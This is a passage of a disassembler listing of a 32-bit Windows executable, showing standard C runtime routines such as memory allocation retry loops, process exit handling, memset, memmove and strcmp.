jmp short loc_407736
; ---------------------------------------------------------------------------
loc_407705: ; CODE XREF: sub_4076D5+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_407711
mov [ecx], bl
jmp short loc_4076EA
; ---------------------------------------------------------------------------
loc_407711: ; CODE XREF: sub_4076D5+36�j
mov edx, ecx
loc_407713: ; CODE XREF: sub_4076D5+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_407720
dec edi
jnz short loc_407713
loc_407720: ; CODE XREF: sub_4076D5+46�j
cmp edi, ebx
jnz short loc_407734
mov [ecx], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4076F4
; ---------------------------------------------------------------------------
loc_407734: ; CODE XREF: sub_4076D5+4D�j
xor eax, eax
loc_407736: ; CODE XREF: sub_4076D5+2E�j
pop edi
pop esi
pop ebx
retn
sub_4076D5 endp
; =============== S U B R O U T I N E =======================================
sub_40773A proc near ; CODE XREF: sub_404C69+3B�p
; sub_405934+48�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_40773E: ; CODE XREF: sub_40773A+39�j
push [esp+8+arg_0]
call sub_4036E0
mov edi, eax
test edi, edi
pop ecx
jnz short loc_407775
cmp ds:dword_425F70, eax
jbe short loc_407775
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_40776E
or eax, 0FFFFFFFFh
loc_40776E: ; CODE XREF: sub_40773A+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40773E
loc_407775: ; CODE XREF: sub_40773A+12�j
; sub_40773A+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_40773A endp
; =============== S U B R O U T I N E =======================================
sub_40777A proc near ; CODE XREF: sub_402DB6+5�p
; sub_40531A+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_40777E: ; CODE XREF: sub_40777A+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D94F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_4077BD
cmp ds:dword_425F70, eax
jbe short loc_4077BD
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_4077B6
or eax, 0FFFFFFFFh
loc_4077B6: ; CODE XREF: sub_40777A+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40777E
loc_4077BD: ; CODE XREF: sub_40777A+1A�j
; sub_40777A+22�j
mov eax, edi
pop edi
pop esi
retn
sub_40777A endp
; =============== S U B R O U T I N E =======================================
sub_4077C2 proc near ; CODE XREF: sub_402D09+58�p
; sub_402D09+6F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_4077C6: ; CODE XREF: sub_4077C2+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40DA6D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_407808
cmp [esp+8+arg_4], eax
jz short loc_407808
cmp ds:dword_425F70, eax
jbe short loc_407808
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407801
or eax, 0FFFFFFFFh
loc_407801: ; CODE XREF: sub_4077C2+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4077C6
loc_407808: ; CODE XREF: sub_4077C2+17�j
; sub_4077C2+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_4077C2 endp
; =============== S U B R O U T I N E =======================================
sub_40780D proc near ; CODE XREF: sub_408DD8+40�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
xor esi, esi
loc_407811: ; CODE XREF: sub_40780D+49�j
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40DC88
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407858
cmp [esp+8+arg_8], eax
jz short loc_407858
cmp ds:dword_425F70, eax
jbe short loc_407858
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407851
or eax, 0FFFFFFFFh
loc_407851: ; CODE XREF: sub_40780D+3F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407811
loc_407858: ; CODE XREF: sub_40780D+1C�j
; sub_40780D+22�j ...
mov eax, edi
pop edi
pop esi
retn
sub_40780D endp
; =============== S U B R O U T I N E =======================================
sub_40785D proc near ; CODE XREF: .kSjx934:0040403F�p
; .kSjx934:00404065�p ...
arg_0 = dword ptr 4
call sub_409C54
push [esp+arg_0]
call sub_409AB4
push ds:off_423930
call sub_405193
push 0FFh
call eax
add esp, 0Ch
retn
sub_40785D endp
; =============== S U B R O U T I N E =======================================
sub_407881 proc near ; CODE XREF: sub_4078A7+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41D0E4
test eax, eax
jz short locret_4078A6
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41D0EC
test eax, eax
jz short locret_4078A6
push [esp+arg_0]
call eax
locret_4078A6: ; CODE XREF: sub_407881+D�j
; sub_407881+1D�j
retn
sub_407881 endp
; =============== S U B R O U T I N E =======================================
sub_4078A7 proc near ; CODE XREF: sub_4036E0+34�p
; sub_403ED3+1C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407881
pop ecx
push [esp+arg_0]
call ds:dword_41D050
int 3 ; Trap to Debugger
sub_4078A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4078BC proc near ; CODE XREF: sub_402DE5+C�p
push 8
call sub_4059F7
pop ecx
retn
sub_4078BC endp
; =============== S U B R O U T I N E =======================================
sub_4078C5 proc near ; CODE XREF: sub_402E1B�p
push 8
call sub_40591F
pop ecx
retn
sub_4078C5 endp
; =============== S U B R O U T I N E =======================================
sub_4078CE proc near ; CODE XREF: sub_407A0B+78�p
; sub_407A0B+88�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4078DE
; ---------------------------------------------------------------------------
loc_4078D3: ; CODE XREF: sub_4078CE+14�j
mov eax, [esi]
test eax, eax
jz short loc_4078DB
call eax
loc_4078DB: ; CODE XREF: sub_4078CE+9�j
add esi, 4
loc_4078DE: ; CODE XREF: sub_4078CE+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4078D3
pop esi
retn
sub_4078CE endp
; =============== S U B R O U T I N E =======================================
sub_4078E6 proc near ; CODE XREF: sub_407979+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4078FE
; ---------------------------------------------------------------------------
loc_4078EF: ; CODE XREF: sub_4078E6+1C�j
test eax, eax
jnz short loc_407904
mov ecx, [esi]
test ecx, ecx
jz short loc_4078FB
call ecx
loc_4078FB: ; CODE XREF: sub_4078E6+11�j
add esi, 4
loc_4078FE: ; CODE XREF: sub_4078E6+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4078EF
loc_407904: ; CODE XREF: sub_4078E6+B�j
pop esi
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
sub_407906 proc near ; CODE XREF: sub_405A28+12�p
; sub_40CB14+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40792E
loc_407911: ; CODE XREF: sub_407906+2F�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40792E: ; CODE XREF: sub_407906+9�j
mov eax, ds:dword_425F78
cmp eax, esi
jz short loc_407911
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407906 endp
; =============== S U B R O U T I N E =======================================
sub_40793D proc near ; CODE XREF: sub_405A28+2D�p
; sub_40F524+11F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407965
loc_407948: ; CODE XREF: sub_40793D+2E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407965: ; CODE XREF: sub_40793D+9�j
cmp ds:dword_425F78, esi
jz short loc_407948
mov ecx, ds:dword_425F84
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40793D endp
; =============== S U B R O U T I N E =======================================
sub_407979 proc near ; CODE XREF: .kSjx934:0040407D�p
arg_0 = dword ptr 4
cmp ds:off_41ED94, 0
jz short loc_40799C
push offset off_41ED94
call sub_40CC52
test eax, eax
pop ecx
jz short loc_40799C
push [esp+arg_0]
call ds:off_41ED94
pop ecx
loc_40799C: ; CODE XREF: sub_407979+7�j
; sub_407979+16�j
call sub_40D59E
push offset dword_41D2D8
push offset dword_41D2BC
call sub_4078E6
test eax, eax
pop ecx
pop ecx
jnz short locret_407A0A
push esi
push edi
push offset sub_40B066
call sub_402E21
mov esi, offset dword_41D288
mov eax, esi
mov edi, offset dword_41D2B8
cmp eax, edi
pop ecx
jnb short loc_4079E2
loc_4079D3: ; CODE XREF: sub_407979+67�j
mov eax, [esi]
test eax, eax
jz short loc_4079DB
call eax
loc_4079DB: ; CODE XREF: sub_407979+5E�j
add esi, 4
cmp esi, edi
jb short loc_4079D3
loc_4079E2: ; CODE XREF: sub_407979+58�j
cmp ds:dword_434DD8, 0
pop edi
pop esi
jz short loc_407A08
push offset dword_434DD8
call sub_40CC52
test eax, eax
pop ecx
jz short loc_407A08
push 0
push 2
push 0
call ds:dword_434DD8
loc_407A08: ; CODE XREF: sub_407979+72�j
; sub_407979+81�j
xor eax, eax
locret_407A0A: ; CODE XREF: sub_407979+3B�j
retn
sub_407979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A0B proc near ; CODE XREF: sub_407AD9+8�p
; sub_407AEA+8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00407AD3 SIZE 00000006 BYTES
push 0Ch
push offset dword_4214F8
call __SEH_prolog4
push 8
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
xor esi, esi
inc esi
cmp ds:dword_425FB8, esi
jz short loc_407A99
mov ds:dword_425FB4, esi
mov al, byte ptr [ebp+arg_8]
mov ds:byte_425FB0, al
cmp [ebp+arg_4], 0
jnz short loc_407A89
push ds:dword_434DD0
call sub_405193
mov edi, eax
push ds:dword_434DCC
call sub_405193
pop ecx
pop ecx
mov [ebp+var_1C], eax
test edi, edi
jz short loc_407A79
loc_407A63: ; CODE XREF: sub_407A0B+68�j
; sub_407A0B+6C�j
sub [ebp+var_1C], 4
cmp [ebp+var_1C], edi
jb short loc_407A79
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_407A63
call eax
jmp short loc_407A63
; ---------------------------------------------------------------------------
loc_407A79: ; CODE XREF: sub_407A0B+56�j
; sub_407A0B+5F�j
push offset dword_41D2E8
mov eax, offset dword_41D2DC
call sub_4078CE
pop ecx
loc_407A89: ; CODE XREF: sub_407A0B+35�j
push offset dword_41D2F4
mov eax, offset dword_41D2EC
call sub_4078CE
pop ecx
loc_407A99: ; CODE XREF: sub_407A0B+21�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407AC4
cmp [ebp+arg_8], 0
jnz short loc_407AD3
mov ds:dword_425FB8, esi
push 8
call sub_40591F
pop ecx
push [ebp+arg_0]
call sub_4078A7
loc_407AC1: ; DATA XREF: .kSjx934:00421510�o
xor esi, esi
inc esi
sub_407A0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AC4 proc near ; CODE XREF: sub_407A0B+95�p
cmp dword ptr [ebp+10h], 0
jz short locret_407AD2
push 8
call sub_40591F
pop ecx
locret_407AD2: ; CODE XREF: sub_407AC4+4�j
retn
sub_407AC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407A0B
loc_407AD3: ; CODE XREF: sub_407A0B+9E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407A0B
; =============== S U B R O U T I N E =======================================
sub_407AD9 proc near ; CODE XREF: .kSjx934:004040B9�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AD9 endp
; =============== S U B R O U T I N E =======================================
sub_407AEA proc near ; CODE XREF: .kSjx934:004040E9�p
; sub_40DD29+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AEA endp
; =============== S U B R O U T I N E =======================================
sub_407AFB proc near ; CODE XREF: .kSjx934:loc_4040BE�p
push 1
push 0
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407AFB endp
; =============== S U B R O U T I N E =======================================
sub_407B0A proc near ; CODE XREF: .kSjx934:loc_4040EE�p
push 1
push 1
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407B0A endp
; =============== S U B R O U T I N E =======================================
sub_407B19 proc near ; CODE XREF: sub_4054D6+C4�p
push esi
call sub_40518A
mov esi, eax
push esi
call sub_408058
push esi
call sub_40CAFA
push esi
call sub_402E33
push esi
call sub_40DEE3
push esi
call sub_40DED9
push esi
call sub_40DCCF
push esi
call nullsub_2
push esi
call sub_40BEDC
push offset sub_407AEA
call sub_405127
add esp, 24h
mov ds:off_423930, eax
pop esi
retn
sub_407B19 endp
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: sub_402E3D+CE�p
; sub_402F39+18�p ...
and ds:dword_434DC4, 0
retn
sub_407B65 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407B70 proc near ; CODE XREF: sub_40177B+4A�p
; sub_40177B+5E�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_407BE5
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_407B9C
cmp edx, 100h
jb short loc_407B9C
cmp ds:dword_433C7C, 0
jz short loc_407B9C
jmp sub_40DF44
; ---------------------------------------------------------------------------
loc_407B9C: ; CODE XREF: sub_407B70+14�j
; sub_407B70+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_407BD5
neg ecx
and ecx, 3
jz short loc_407BB7
sub edx, ecx
loc_407BAD: ; CODE XREF: sub_407B70+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_407BAD
loc_407BB7: ; CODE XREF: sub_407B70+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_407BD5
rep stosd
test edx, edx
jz short loc_407BDF
loc_407BD5: ; CODE XREF: sub_407B70+32�j
; sub_407B70+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_407BD5
loc_407BDF: ; CODE XREF: sub_407B70+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_407BE5: ; CODE XREF: sub_407B70+A�j
mov eax, [esp+arg_0]
retn
sub_407B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF0 proc near ; CODE XREF: sub_402F72+43�p
; sub_408DD8+35�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407C10
cmp edi, eax
jb loc_407DB4
loc_407C10: ; CODE XREF: sub_407BF0+16�j
cmp ecx, 100h
jb short loc_407C37
cmp ds:dword_433C7C, 0
jz short loc_407C37
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407C37
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_407C37: ; CODE XREF: sub_407BF0+26�j
; sub_407BF0+2F�j ...
test edi, 3
jnz short loc_407C54
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C54: ; CODE XREF: sub_407BF0+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_407C6C
and eax, 3
add ecx, eax
jmp dword ptr loc_407C74+4[eax*4]
; ---------------------------------------------------------------------------
loc_407C6C: ; CODE XREF: sub_407BF0+6E�j
jmp dword ptr loc_407D74[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C74: ; CODE XREF: sub_407BF0+58�j
; sub_407BF0+B6�j ...
jmp off_407CF8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407C88
dd offset loc_407CB4
; ---------------------------------------------------------------------------
fdivr dword ptr [eax+eax*2+0]
loc_407C88: ; DATA XREF: sub_407BF0+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407CB4: ; DATA XREF: sub_407BF0+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407CF8 dd offset loc_407D5B ; DATA XREF: sub_407BF0:loc_407C74�r
dd offset loc_407D48
dd offset loc_407D40
dd offset loc_407D38
dd offset loc_407D30
dd offset loc_407D28
dd offset loc_407D20
dd offset loc_407D18
; ---------------------------------------------------------------------------
loc_407D18: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407D20: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_407D28: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407D30: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_407D38: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407D40: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_407D48: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407D5B: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0:off_407CF8�o
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407D64 dd offset loc_407D74 ; DATA XREF: sub_407BF0+5C�r
; sub_407BF0+BA�r ...
dd offset loc_407D7C
dd offset loc_407D88
dd offset loc_407D9C
; ---------------------------------------------------------------------------
loc_407D74: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D7C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D88: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D9C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407DB4: ; CODE XREF: sub_407BF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407DE8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DDC: ; CODE XREF: sub_407BF0+1DD�j
; sub_407BF0+238�j ...
neg ecx
jmp off_407EB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DE8: ; CODE XREF: sub_407BF0+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407E00
and eax, 3
sub ecx, eax
jmp dword ptr loc_407E00+4[eax*4]
; ---------------------------------------------------------------------------
loc_407E00: ; CODE XREF: sub_407BF0+202�j
; DATA XREF: sub_407BF0+209�r
jmp off_407F00[ecx*4]
; ---------------------------------------------------------------------------
align 4
adc al, 7Eh
inc eax
add [eax], bh
jle short loc_407E4F
add [eax+7Eh], ah
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
loc_407E4F: ; CODE XREF: sub_407BF0+21D�j
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407EB4
dd offset loc_407EBC
dd offset loc_407EC4
dd offset loc_407ECC
dd offset loc_407ED4
dd offset loc_407EDC
dd offset loc_407EE4
off_407EB0 dd offset loc_407EF7 ; DATA XREF: sub_407BF0+1EE�r
; ---------------------------------------------------------------------------
loc_407EB4: ; DATA XREF: sub_407BF0+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_407EBC: ; DATA XREF: sub_407BF0+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407EC4: ; DATA XREF: sub_407BF0+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_407ECC: ; DATA XREF: sub_407BF0+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407ED4: ; DATA XREF: sub_407BF0+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_407EDC: ; DATA XREF: sub_407BF0+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407EE4: ; DATA XREF: sub_407BF0+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407EF7: ; CODE XREF: sub_407BF0+1EE�j
; DATA XREF: sub_407BF0:off_407EB0�o
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407F00 dd offset loc_407F10 ; DATA XREF: sub_407BF0+1E3�r
; sub_407BF0:loc_407E00�r ...
dd offset loc_407F18
dd offset loc_407F28
dd offset loc_407F3C
; ---------------------------------------------------------------------------
loc_407F10: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F18: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F28: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F3C: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_402FED+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421518
call __SEH_prolog4
push 0Eh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_407FA6
mov eax, ds:dword_425FC0
mov edx, offset dword_425FBC
loc_407F81: ; CODE XREF: sub_407F55+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_407F99
cmp [eax], ecx
jnz short loc_407FB8
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_403603
pop ecx
loc_407F99: ; CODE XREF: sub_407F55+31�j
push dword ptr [esi+4]
call sub_403603
pop ecx
and dword ptr [esi+4], 0
loc_407FA6: ; CODE XREF: sub_407F55+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FBC
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407FB8: ; CODE XREF: sub_407F55+35�j
mov edx, eax
jmp short loc_407F81
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FBC proc near ; CODE XREF: sub_407F55+58�p
; DATA XREF: .kSjx934:00421530�o
push 0Eh
call sub_40591F
pop ecx
retn
sub_407FBC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407FD0 proc near ; CODE XREF: sub_403017+C�p
; sub_40B1FC+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40801C
loc_407FE0: ; CODE XREF: sub_407FD0+3C�j
; sub_407FD0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+3]
jnz short loc_408014
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_407FE0
mov edi, edi
loc_408010: ; CODE XREF: sub_407FD0+18�j
; sub_407FD0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_408014: ; CODE XREF: sub_407FD0+14�j
; sub_407FD0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_40801C: ; CODE XREF: sub_407FD0+E�j
test edx, 1
jz short loc_40803C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_408014
add ecx, 1
or al, al
jz short loc_408010
test edx, 2
jz short loc_407FE0
loc_40803C: ; CODE XREF: sub_407FD0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
add ecx, 2
jmp short loc_407FE0
sub_407FD0 endp
; =============== S U B R O U T I N E =======================================
sub_408058 proc near ; CODE XREF: sub_407B19+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_425FC4, eax
retn
sub_408058 endp
; =============== S U B R O U T I N E =======================================
sub_408062 proc near ; CODE XREF: sub_40304B+B�p
; sub_4036E0+8C�p ...
arg_0 = dword ptr 4
push ds:dword_425FC4
call sub_405193
test eax, eax
pop ecx
jz short loc_408081
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_408081
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408081: ; CODE XREF: sub_408062+E�j
; sub_408062+19�j
